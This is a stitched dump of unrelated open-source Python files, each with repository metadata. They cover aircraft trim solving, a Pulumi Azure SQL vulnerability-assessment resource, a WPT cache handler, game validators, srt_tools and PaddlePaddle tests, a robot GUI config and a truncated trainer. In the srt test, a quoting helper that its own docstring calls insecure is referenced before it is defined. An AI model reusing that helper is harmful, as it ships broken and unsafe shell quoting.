# fail loudly instead of dropping into pdb when an input goes non-finite
if not (np.isfinite(alpha) and np.isfinite(deflection_gamma) and np.isfinite(thrust)):
raise ValueError('Non-finite trim input: alpha={}, gamma={}, thrust={}'.format(
alpha, deflection_gamma, thrust))
# cout.cout_wrap('--', 2)
# cout.cout_wrap('Trying trim: ', 2)
# cout.cout_wrap('Alpha: ' + str(alpha*180/np.pi), 2)
# cout.cout_wrap('CS deflection: ' + str((deflection_gamma - alpha)*180/np.pi), 2)
# cout.cout_wrap('Thrust: ' + str(thrust), 2)
# modify the trim in the static_coupled solver
self.solver.change_trim(alpha,
thrust,
self.settings['thrust_nodes'],
deflection_gamma - alpha,
self.settings['tail_cs_index'])
# run the solver
self.solver.run()
# extract resultants
forces, moments = self.solver.extract_resultants()
forcez = forces[2]
forcex = forces[0]
moment = moments[1]
# cout.cout_wrap('Forces and moments:', 2)
# cout.cout_wrap('fx = ' + str(forces[0]) + ' mx = ' + str(moments[0]), 2)
# cout.cout_wrap('fy = ' + str(forces[1]) + ' my = ' + str(moments[1]), 2)
# cout.cout_wrap('fz = ' + str(forces[2]) + ' mz = ' + str(moments[2]), 2)
self.table.print_line([self.i_iter,
alpha*180/np.pi,
(deflection_gamma - alpha)*180/np.pi,
thrust,
forces[0],
forces[1],
forces[2],
moments[0],
moments[1],
moments[2]])
return forcez, moment, forcex
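# Hedged sketch (not part of the original file): the per-channel update used in
# trim_algorithm above is a secant/Newton step, x_new = x_old - f(x_old)/f'(x_old),
# with the gradient re-estimated from consecutive iterates. In isolation:
def _secant_step(x_old, f_old, grad_old):
    return x_old - f_old / grad_old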
|
81d3fc3ff61dad36d8a97238c170bf9f248df56a
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/security/v20230201preview/sql_vulnerability_assessment_baseline_rule.py
|
0892c1e7cb9c71c0f290a61419df077c339903f6
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 9,830
|
py
|
sql_vulnerability_assessment_baseline_rule.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['SqlVulnerabilityAssessmentBaselineRuleArgs', 'SqlVulnerabilityAssessmentBaselineRule']
@pulumi.input_type
class SqlVulnerabilityAssessmentBaselineRuleArgs:
def __init__(__self__, *,
resource_id: pulumi.Input[str],
workspace_id: pulumi.Input[str],
latest_scan: Optional[pulumi.Input[bool]] = None,
results: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
rule_id: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a SqlVulnerabilityAssessmentBaselineRule resource.
:param pulumi.Input[str] resource_id: The identifier of the resource.
:param pulumi.Input[str] workspace_id: The workspace Id.
:param pulumi.Input[bool] latest_scan: Take results from latest scan.
:param pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]] results: Expected results to be inserted into the baseline.
Leave this field empty if LatestScan == true.
:param pulumi.Input[str] rule_id: The rule Id.
"""
pulumi.set(__self__, "resource_id", resource_id)
pulumi.set(__self__, "workspace_id", workspace_id)
if latest_scan is not None:
pulumi.set(__self__, "latest_scan", latest_scan)
if results is not None:
pulumi.set(__self__, "results", results)
if rule_id is not None:
pulumi.set(__self__, "rule_id", rule_id)
@property
@pulumi.getter(name="resourceId")
def resource_id(self) -> pulumi.Input[str]:
"""
The identifier of the resource.
"""
return pulumi.get(self, "resource_id")
@resource_id.setter
def resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_id", value)
@property
@pulumi.getter(name="workspaceId")
def workspace_id(self) -> pulumi.Input[str]:
"""
The workspace Id.
"""
return pulumi.get(self, "workspace_id")
@workspace_id.setter
def workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "workspace_id", value)
@property
@pulumi.getter(name="latestScan")
def latest_scan(self) -> Optional[pulumi.Input[bool]]:
"""
Take results from latest scan.
"""
return pulumi.get(self, "latest_scan")
@latest_scan.setter
def latest_scan(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "latest_scan", value)
@property
@pulumi.getter
def results(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]]:
"""
Expected results to be inserted into the baseline.
Leave this field empty if LatestScan == true.
"""
return pulumi.get(self, "results")
@results.setter
def results(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]]):
pulumi.set(self, "results", value)
@property
@pulumi.getter(name="ruleId")
def rule_id(self) -> Optional[pulumi.Input[str]]:
"""
The rule Id.
"""
return pulumi.get(self, "rule_id")
@rule_id.setter
def rule_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rule_id", value)
class SqlVulnerabilityAssessmentBaselineRule(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
latest_scan: Optional[pulumi.Input[bool]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
results: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
rule_id: Optional[pulumi.Input[str]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Rule results.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] latest_scan: Take results from latest scan.
:param pulumi.Input[str] resource_id: The identifier of the resource.
:param pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]] results: Expected results to be inserted into the baseline.
Leave this field empty if LatestScan == true.
:param pulumi.Input[str] rule_id: The rule Id.
:param pulumi.Input[str] workspace_id: The workspace Id.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlVulnerabilityAssessmentBaselineRuleArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Rule results.
:param str resource_name: The name of the resource.
:param SqlVulnerabilityAssessmentBaselineRuleArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlVulnerabilityAssessmentBaselineRuleArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
latest_scan: Optional[pulumi.Input[bool]] = None,
resource_id: Optional[pulumi.Input[str]] = None,
results: Optional[pulumi.Input[Sequence[pulumi.Input[Sequence[pulumi.Input[str]]]]]] = None,
rule_id: Optional[pulumi.Input[str]] = None,
workspace_id: Optional[pulumi.Input[str]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlVulnerabilityAssessmentBaselineRuleArgs.__new__(SqlVulnerabilityAssessmentBaselineRuleArgs)
__props__.__dict__["latest_scan"] = latest_scan
if resource_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_id'")
__props__.__dict__["resource_id"] = resource_id
__props__.__dict__["results"] = results
__props__.__dict__["rule_id"] = rule_id
if workspace_id is None and not opts.urn:
raise TypeError("Missing required property 'workspace_id'")
__props__.__dict__["workspace_id"] = workspace_id
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-native:security:SqlVulnerabilityAssessmentBaselineRule"), pulumi.Alias(type_="azure-native:security/v20200701preview:SqlVulnerabilityAssessmentBaselineRule")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(SqlVulnerabilityAssessmentBaselineRule, __self__).__init__(
'azure-native:security/v20230201preview:SqlVulnerabilityAssessmentBaselineRule',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlVulnerabilityAssessmentBaselineRule':
"""
Get an existing SqlVulnerabilityAssessmentBaselineRule resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SqlVulnerabilityAssessmentBaselineRuleArgs.__new__(SqlVulnerabilityAssessmentBaselineRuleArgs)
__props__.__dict__["name"] = None
__props__.__dict__["properties"] = None
__props__.__dict__["type"] = None
return SqlVulnerabilityAssessmentBaselineRule(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.RuleResultsPropertiesResponse']:
"""
Rule results properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type
"""
return pulumi.get(self, "type")
|
2229f0fec8c421471daccbb62ffc29af10af7364
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/blink/web_tests/external/wpt/network-error-logging/support/cached-with-validation.py
|
e5090e03929d96169791e6958c2a9a7d20f1aba6
|
[
"LGPL-2.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-1.0-or-later",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft",
"BSD-3-Clause",
"MIT",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 574
|
py
|
cached-with-validation.py
|
ETAG = b'"123abc"'
CONTENT_TYPE = b"text/plain"
CONTENT = u"lorem ipsum dolor sit amet"
def main(request, response):
# let caching kick in if possible (conditional GET)
etag = request.headers.get(b"If-None-Match", None)
if etag == ETAG:
response.headers.set(b"X-HTTP-STATUS", 304)
response.status = (304, b"Not Modified")
return u""
# cache miss, so respond with the actual content
response.status = (200, b"OK")
response.headers.set(b"ETag", ETAG)
response.headers.set(b"Content-Type", CONTENT_TYPE)
return CONTENT
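# Hedged client-side sketch (not part of the original file): exercising both
# paths of the handler above with urllib; the URL assumes a local wpt server.
import urllib.error
import urllib.request
def _example_revalidate(url="http://localhost:8000/network-error-logging/support/cached-with-validation.py"):
    first = urllib.request.urlopen(url)  # cache miss: 200 OK with ETag
    etag = first.headers.get("ETag")
    req = urllib.request.Request(url, headers={"If-None-Match": etag})
    try:
        urllib.request.urlopen(req)
    except urllib.error.HTTPError as err:
        return err.code  # conditional hit: expected 304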
|
69fb81dc7b40743f79731cb2242d81437765671d
|
bb33e6be8316f35decbb2b81badf2b6dcf7df515
|
/source/res/scripts/client/gui/prb_control/entities/stronghold/unit/actions_validator.py
|
8f43fff0863f8fc957f666b9d9d89563ec8b0a05
|
[] |
no_license
|
StranikS-Scan/WorldOfTanks-Decompiled
|
999c9567de38c32c760ab72c21c00ea7bc20990c
|
d2fe9c195825ececc728e87a02983908b7ea9199
|
refs/heads/1.18
| 2023-08-25T17:39:27.718097
| 2022-09-22T06:49:44
| 2022-09-22T06:49:44
| 148,696,315
| 103
| 39
| null | 2022-09-14T17:50:03
| 2018-09-13T20:49:11
|
Python
|
UTF-8
|
Python
| false
| false
| 2,395
|
py
|
actions_validator.py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: scripts/client/gui/prb_control/entities/stronghold/unit/actions_validator.py
from gui.prb_control.entities.base.squad.actions_validator import UnitActionsValidator
from gui.prb_control.entities.base.unit.actions_validator import UnitVehiclesValidator, CommanderValidator, UnitStateValidator
from gui.prb_control.items import ValidationResult
from gui.prb_control.settings import UNIT_RESTRICTION
class StrongholdVehiclesValidator(UnitVehiclesValidator):
pass
class StrongholdUnitSlotsValidator(CommanderValidator):
def _validate(self):
rosterSettings = self._entity.getRosterSettings()
stats = self._entity.getStats()
isPlayersMatchingAvailable = self._entity.isPlayersMatchingAvailable()
allMembersReady = stats.readyCount == stats.occupiedSlotsCount
if isPlayersMatchingAvailable:
isClanMembersEnough = stats.clanMembersInRoster >= rosterSettings.getMinClanMembersCount()
if not isClanMembersEnough:
return ValidationResult(False, UNIT_RESTRICTION.UNIT_MIN_CLAN_MEMBERS)
if not allMembersReady:
return ValidationResult(False, UNIT_RESTRICTION.NOT_READY_IN_SLOTS)
if stats.occupiedSlotsCount < rosterSettings.getMaxSlots() + 1:
return ValidationResult(True, UNIT_RESTRICTION.UNIT_WILL_SEARCH_PLAYERS)
else:
if rosterSettings.getMinSlots() > stats.occupiedSlotsCount:
return ValidationResult(False, UNIT_RESTRICTION.MIN_SLOTS)
if not allMembersReady:
return ValidationResult(False, UNIT_RESTRICTION.NOT_READY_IN_SLOTS)
return super(StrongholdUnitSlotsValidator, self)._validate()
class StrongholdUnitStateValidator(UnitStateValidator):
def _validate(self):
return ValidationResult(False, UNIT_RESTRICTION.UNIT_IS_IN_PLAYERS_MATCHING) if self._entity.inPlayersMatchingMode() else super(StrongholdUnitStateValidator, self)._validate()
class StrongholdActionsValidator(UnitActionsValidator):
def _createVehiclesValidator(self, entity):
return StrongholdVehiclesValidator(entity)
def _createSlotsValidator(self, entity):
return StrongholdUnitSlotsValidator(entity)
def _createStateValidator(self, entity):
return StrongholdUnitStateValidator(entity)
|
a430593f6bc94ad928577a9f5193d1233b95430d
|
c8c260b419b56ab6f1c86f52bc5df323af0d9009
|
/srt_tools/tests/test_srt_tools.py
|
b11aa54fd7f648e4a2fd5c405a6ae2b928b2206f
|
[
"MIT"
] |
permissive
|
cdown/srt
|
a86e900f4cf2bae9322231b54a2bb576e8b030bc
|
434d0c1c9d5c26d5c3fb1ce979fc05b478e9253c
|
refs/heads/develop
| 2023-07-11T09:20:53.086151
| 2023-03-28T02:33:47
| 2023-03-28T02:33:47
| 28,550,291
| 394
| 47
|
MIT
| 2023-09-09T21:16:32
| 2014-12-28T01:05:38
|
Python
|
UTF-8
|
Python
| false
| false
| 3,482
|
py
|
test_srt_tools.py
|
#!/usr/bin/env python
import os
import subprocess
import sys
import tempfile
try:
from shlex import quote
except ImportError: # <3.3 fallback
from pipes import quote
sample_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "files")
if os.name == "nt":
# Sigh, shlex.quote quotes incorrectly on Windows
quote = windows_crappy_quote
def run_srt_util(cmd, shell=False, encoding="utf-8-sig"):
extra_env = {}
env = {"PYTHONPATH": ".", "SystemRoot": r"C:\Windows"}
env.update(extra_env)
raw_out = subprocess.check_output(cmd, shell=shell, env=env)
return raw_out.decode(encoding)
def windows_crappy_quote(data):
"""
I'm 100% sure this isn't secure, please don't use it with untrusted code. I
beg you.
"""
data = data.replace('"', '""')
return '"' + data + '"'
def assert_supports_all_io_methods(cmd, exclude_output=False, exclude_stdin=False):
# TODO: pytype doesn't like the mixed types in the matrix, but this works
# fine. Maybe it would be happier with a namedtuple?
cmd[0] = "srt_tools/" + cmd[0] # pytype: disable=unsupported-operands
cmd.insert(0, sys.executable) # pytype: disable=attribute-error
in_file = os.path.join(sample_dir, "ascii.srt")
in_file_gb = os.path.join(sample_dir, "gb2312.srt")
fd, out_file = tempfile.mkstemp()
# This is accessed by filename, not fd
os.close(fd)
outputs = []
cmd_string = " ".join(quote(x) for x in cmd)
try:
outputs.append(run_srt_util(cmd + ["-i", in_file]))
if not exclude_stdin:
outputs.append(
run_srt_util("%s < %s" % (cmd_string, quote(in_file)), shell=True)
)
if not exclude_output:
run_srt_util(cmd + ["-i", in_file, "-o", out_file])
run_srt_util(
cmd + ["-i", in_file_gb, "-o", out_file, "-e", "gb2312"],
encoding="gb2312",
)
if not exclude_stdin:
run_srt_util(
"%s < %s > %s" % (cmd_string, quote(in_file), quote(out_file)),
shell=True,
)
run_srt_util(
"%s < %s > %s"
% (cmd_string + " -e gb2312", quote(in_file), quote(out_file)),
shell=True,
encoding="gb2312",
)
assert len(set(outputs)) == 1, repr(outputs)
if os.name == "nt":
assert "\r\n" in outputs[0]
else:
assert "\r\n" not in outputs[0]
finally:
os.remove(out_file)
def test_tools_support():
matrix = [
(["srt-normalise"], False),
(["srt-deduplicate"], False),
(["srt-fixed-timeshift", "--seconds", "5"], False),
(
[
"srt-linear-timeshift",
"--f1",
"00:00:01,000",
"--f2",
"00:00:02,000",
"--t1",
"00:00:03,000",
"--t2",
"00:00:04,000",
],
False,
),
(["srt-lines-matching", "-f", "lambda x: True"], False),
(["srt-process", "-f", "lambda x: x"], False),
(["srt-mux"], False, True),
(["srt-mux", "-t"], False, True),
# Need to sort out time/thread issues
# (('srt-play'), True),
]
for args in matrix:
assert_supports_all_io_methods(*args)
|
4d1b6212a887f6ed83903945a1fb47bc131aa9c9
|
974d04d2ea27b1bba1c01015a98112d2afb78fe5
|
/test/legacy_test/test_generator_dataloader.py
|
9d895538521900a115eb35913157cc69cafc96c7
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/Paddle
|
b3d2583119082c8e4b74331dacc4d39ed4d7cff0
|
22a11a60e0e3d10a3cf610077a3d9942a6f964cb
|
refs/heads/develop
| 2023-08-17T21:27:30.568889
| 2023-08-17T12:38:22
| 2023-08-17T12:38:22
| 65,711,522
| 20,414
| 5,891
|
Apache-2.0
| 2023-09-14T19:20:51
| 2016-08-15T06:59:08
|
C++
|
UTF-8
|
Python
| false
| false
| 7,202
|
py
|
test_generator_dataloader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import numpy as np
import paddle
from paddle import fluid
from paddle.fluid.reader import DataLoaderBase
EPOCH_NUM = 20
BATCH_SIZE = 32
BATCH_NUM = 20
CLASS_NUM = 10
def random_reader():
np.random.seed(1)
for i in range(BATCH_SIZE * BATCH_NUM):
image = np.random.random([784])
label = np.random.random_integers(low=0, high=CLASS_NUM - 1)
yield image, label
def simple_fc_net(places, use_legacy_py_reader, use_double_buffer):
paddle.seed(1)
paddle.framework.random._manual_program_seed(1)
startup_prog = fluid.Program()
main_prog = fluid.Program()
with fluid.unique_name.guard():
with fluid.program_guard(main_prog, startup_prog):
image = paddle.static.data(
name='image', shape=[-1, 784], dtype='float32'
)
label = paddle.static.data(
name='label', shape=[-1, 1], dtype='int64'
)
py_reader = fluid.io.DataLoader.from_generator(
feed_list=[image, label],
capacity=4,
iterable=not use_legacy_py_reader,
use_double_buffer=use_double_buffer,
)
hidden = image
for hidden_size in [10, 20, 30]:
hidden = paddle.static.nn.fc(
hidden,
size=hidden_size,
activation='tanh',
bias_attr=fluid.ParamAttr(
initializer=paddle.nn.initializer.Constant(value=1.0)
),
)
predict_label = paddle.static.nn.fc(
hidden, size=CLASS_NUM, activation='softmax'
)
loss = paddle.mean(
paddle.nn.functional.cross_entropy(
input=predict_label,
label=label,
reduction='none',
use_softmax=False,
)
)
optimizer = paddle.optimizer.Adam()
optimizer.minimize(loss)
return startup_prog, main_prog, py_reader, loss
class TestBase(unittest.TestCase):
def run_main(
self,
use_legacy_py_reader,
places,
use_double_buffer,
):
scope = fluid.Scope()
with fluid.scope_guard(scope):
startup_prog, main_prog, py_reader, loss = simple_fc_net(
places, use_legacy_py_reader, use_double_buffer
)
reader = paddle.batch(random_reader, batch_size=BATCH_SIZE)
ps = places if use_double_buffer else fluid.cpu_places(len(places))
py_reader.set_sample_list_generator(
reader, places=ps if py_reader.iterable else None
)
exe = fluid.Executor(place=places[0])
exe.run(startup_prog)
prog = fluid.CompiledProgram(main_prog)
step = 0
step_list = []
loss_list = []
start_t = time.time()
if not py_reader.iterable:
for _ in range(EPOCH_NUM):
step = 0
py_reader.start()
while True:
try:
(L,) = exe.run(
program=prog,
fetch_list=[loss],
use_program_cache=True,
)
loss_list.append(np.mean(L))
step += 1
except fluid.core.EOFException:
py_reader.reset()
break
step_list.append(step)
else:
for _ in range(EPOCH_NUM):
step = 0
for d in py_reader():
assert len(d) == len(places), "{} != {}".format(
len(d), len(places)
)
for i, item in enumerate(d):
image = item['image']
label = item['label']
assert image.shape() == [BATCH_SIZE, 784]
assert label.shape() == [BATCH_SIZE, 1]
assert image._place()._equals(ps[i])
assert label._place()._equals(ps[i])
(L,) = exe.run(
program=prog,
feed=d,
fetch_list=[loss],
use_program_cache=True,
)
loss_list.append(np.mean(L))
step += 1
step_list.append(step)
end_t = time.time()
ret = {
"time": end_t - start_t,
"step": step_list,
"loss": np.array(loss_list),
}
return ret
def prepare_places(self, with_cpu=True, with_gpu=True):
places = []
if with_cpu:
places.append([fluid.CPUPlace()])
if with_gpu and fluid.core.is_compiled_with_cuda():
tmp = fluid.cuda_places()
assert len(tmp) > 0, "no gpu detected"
places.append([tmp[0]])
return places
def test_main(self):
for p in self.prepare_places():
for use_double_buffer in [False, True]:
results = []
for use_legacy_py_reader in [False, True]:
print(p, use_double_buffer, use_legacy_py_reader)
ret = self.run_main(
use_legacy_py_reader=use_legacy_py_reader,
places=p,
use_double_buffer=use_double_buffer,
)
results.append(ret)
if not use_double_buffer:
diff = np.max(
np.abs(results[0]['loss'] - results[1]['loss'])
)
self.assertLess(diff, 1e-3)
class TestDataLoaderBaseAbstract(unittest.TestCase):
def test_main(self):
loader = DataLoaderBase()
with self.assertRaises(NotImplementedError):
loader.__iter__()
with self.assertRaises(NotImplementedError):
loader.__next__()
if __name__ == '__main__':
unittest.main()
|
0e564e574247bd5075838570416fcd1422d0f139
|
5999474eb6a5d12efe7ca7bafc7e6e4048c65fc0
|
/pyUI/commonVar.py
|
74f21179ba8dde2113e7c8568513b5b8ed3d431f
|
[
"MIT"
] |
permissive
|
PetoiCamp/OpenCat
|
dd1c4bf857f7831f902aef812763581aeedb5d8e
|
335e0fe529f1acb405f879c5b6012398c835d953
|
refs/heads/main
| 2023-09-05T10:27:06.631580
| 2023-09-03T17:21:02
| 2023-09-03T17:21:02
| 326,441,188
| 2,374
| 315
|
MIT
| 2023-09-14T12:26:31
| 2021-01-03T15:42:00
|
C++
|
UTF-8
|
Python
| false
| false
| 2,885
|
py
|
commonVar.py
|
from translate import *
import sys
sys.path.append('../serialMaster/')
resourcePath = './resources/'
releasePath = './release/'
sys.path.append(resourcePath)
from ardSerial import *
from tkinter import *
from tkinter import messagebox
from PIL import ImageTk, Image
import tkinter.font as tkFont
import threading
import random
import datetime
import platform
import os
NyBoard_version = 'NyBoard_V1_2'
verNumber = sys.version.split('(')[0].split()[0]
verNumber = verNumber.split('.')
print(verNumber)
#verNumber = [2,1,1] #for testing
supportHoverTip = True
if (int(verNumber[0]), int(verNumber[1])) < (3, 7): # compare (major, minor) as a tuple
print("Please upgrade your Python to 3.7.1 or above!")
root = Tk()
root.overrideredirect(1)
root.withdraw()
messagebox.showwarning(title='Warning', message='Please upgrade your Python\nto 3.7.1 or above\nto show hovertips!')
root.destroy()
supportHoverTip = False
# exit(0)
try:
from idlelib.tooltip import Hovertip
except Exception as e:
logger.info("Cannot import hovertip!")
raise e
NaJoints = {
'Nybble': [3, 4, 5, 6, 7],
'Bittle': [1, 2, 3, 4, 5, 6, 7],
'DoF16' : []
}
scaleNames = [
'Head Pan', 'Head Tilt', 'Tail Pan', 'N/A',
'Shoulder', 'Shoulder', 'Shoulder', 'Shoulder',
'Arm', 'Arm', 'Arm', 'Arm',
'Knee', 'Knee', 'Knee', 'Knee']
sideNames = ['Left Front', 'Right Front', 'Right Back', 'Left Back']
ports = []
def mkdir(path):
# strip surrounding spaces and any trailing path separators
path = path.strip()
path = path.rstrip("\\").rstrip("/")
# create the directory only if it does not already exist
isExists = os.path.exists(path)
if not isExists:
os.makedirs(path)
print(path + ' created successfully')
return True
else:
print(path + ' already exists')
return False
if platform.system() == "Windows": # for Windows
separator = '\\'
homeDri = os.getenv('HOMEDRIVE')
homePath = os.getenv('HomePath')
configDir = homeDri + '\\' + homePath
else: # for Linux & macOS
separator = '/'
home = os.getenv('HOME')
configDir = home
configDir = configDir + separator + '.config' + separator + 'Petoi'
mkdir(configDir)
defaultConfPath = configDir + separator + 'defaultConfig.txt'
print(defaultConfPath)
def createImage(frame, imgFile, imgW):
img = Image.open(imgFile)
ratio = img.size[0] / imgW
img = img.resize((imgW, round(img.size[1] / ratio)))
image = ImageTk.PhotoImage(img)
imageFrame = Label(frame, image=image)
imageFrame.image = image
return imageFrame
def tip(item, note):
if supportHoverTip:
Hovertip(item,note)
# else:
# print(note)
|
304a2b89927d8172b4ba0f3f804a2ab3f914b862
|
58375cb29ebcd2da7adc182fd10c6f76d6deee6e
|
/FOTS/base/base_trainer.py
|
1f9a0e28b945407160adb8b8675aa03ac8c1a9d4
|
[
"BSD-3-Clause"
] |
permissive
|
jiangxiluning/FOTS.PyTorch
|
d0d5a53595308335f20803d7a1d73274a4dad5a7
|
7484a81417f35b4f5c48edd3eb3e855416797379
|
refs/heads/master
| 2023-02-19T23:45:06.317493
| 2023-02-14T15:30:18
| 2023-02-14T15:30:18
| 142,129,096
| 726
| 236
|
BSD-3-Clause
| 2022-10-06T17:19:51
| 2018-07-24T08:31:45
|
Python
|
UTF-8
|
Python
| false
| false
| 7,420
|
py
|
base_trainer.py
|
import os
import math
import json
import logging
import torch
import torch.optim as optim
from tensorboardX import SummaryWriter
from ..utils.util import ensure_dir
class BaseTrainer:
"""
Base class for all trainers
"""
def __init__(self, model, loss, metrics, resume, config, train_logger=None):
self.config = config
self.logger = logging.getLogger(self.__class__.__name__)
self.model = model
self.loss = loss
self.metrics = metrics
self.name = config['name']
self.epochs = config['trainer']['epochs']
self.save_freq = config['trainer']['save_freq']
self.verbosity = config['trainer']['verbosity']
self.summary_writer = SummaryWriter()
if torch.cuda.is_available():
if config['cuda']:
self.with_cuda = True
self.gpus = {i: item for i, item in enumerate(self.config['gpus'])}
device = 'cuda'
if torch.cuda.device_count() > 1 and len(self.gpus) > 1:
self.model.parallelize()
torch.cuda.empty_cache()
else:
self.with_cuda = False
device = 'cpu'
else:
self.logger.warning('Warning: There\'s no CUDA support on this machine, '
'training is performed on CPU.')
self.with_cuda = False
device = 'cpu'
self.device = torch.device(device)
self.model.to(self.device)
self.logger.debug('Model is initialized.')
self._log_memory_usage()
self.train_logger = train_logger
self.optimizer = self.model.optimize(config['optimizer_type'], config['optimizer'])
self.lr_scheduler = getattr(
optim.lr_scheduler,
config['lr_scheduler_type'], None)
if self.lr_scheduler:
self.lr_scheduler = self.lr_scheduler(self.optimizer, **config['lr_scheduler'])
self.lr_scheduler_freq = config['lr_scheduler_freq']
self.monitor = config['trainer']['monitor']
self.monitor_mode = config['trainer']['monitor_mode']
assert self.monitor_mode == 'min' or self.monitor_mode == 'max'
self.monitor_best = math.inf if self.monitor_mode == 'min' else -math.inf
self.start_epoch = 1
self.checkpoint_dir = os.path.join(config['trainer']['save_dir'], self.name)
ensure_dir(self.checkpoint_dir)
json.dump(config, open(os.path.join(self.checkpoint_dir, 'pretrain.json'), 'w'),
indent=4, sort_keys=False)
if resume:
self._resume_checkpoint(resume)
def train(self):
"""
Full training logic
"""
print(self.epochs)
for epoch in range(self.start_epoch, self.epochs + 1):
try:
result = self._train_epoch(epoch)
except torch.cuda.CudaError:
self._log_memory_usage()
raise # re-raise: without this, 'result' would be undefined below
log = {'epoch': epoch}
for key, value in result.items():
if key == 'metrics':
for i, metric in enumerate(self.metrics):
log[metric.__name__] = result['metrics'][i]
elif key == 'val_metrics':
for i, metric in enumerate(self.metrics):
log['val_' + metric.__name__] = result['val_metrics'][i]
else:
log[key] = value
if self.train_logger is not None:
self.train_logger.add_entry(log)
if self.verbosity >= 1:
for key, value in log.items():
self.logger.info(' {:15s}: {}'.format(str(key), value))
if (self.monitor_mode == 'min' and log[self.monitor] < self.monitor_best)\
or (self.monitor_mode == 'max' and log[self.monitor] > self.monitor_best):
self.monitor_best = log[self.monitor]
self._save_checkpoint(epoch, log, save_best=True)
if epoch % self.save_freq == 0:
self._save_checkpoint(epoch, log)
            if self.lr_scheduler:
                self.lr_scheduler.step()
                lr = self.lr_scheduler.get_last_lr()[0]  # lr in effect after the step
                self.logger.info('New Learning Rate: {:.8f}'.format(lr))
            # Log the train value, plus the validation value when it is available
            scalars = {'train_' + self.monitor: log[self.monitor]}
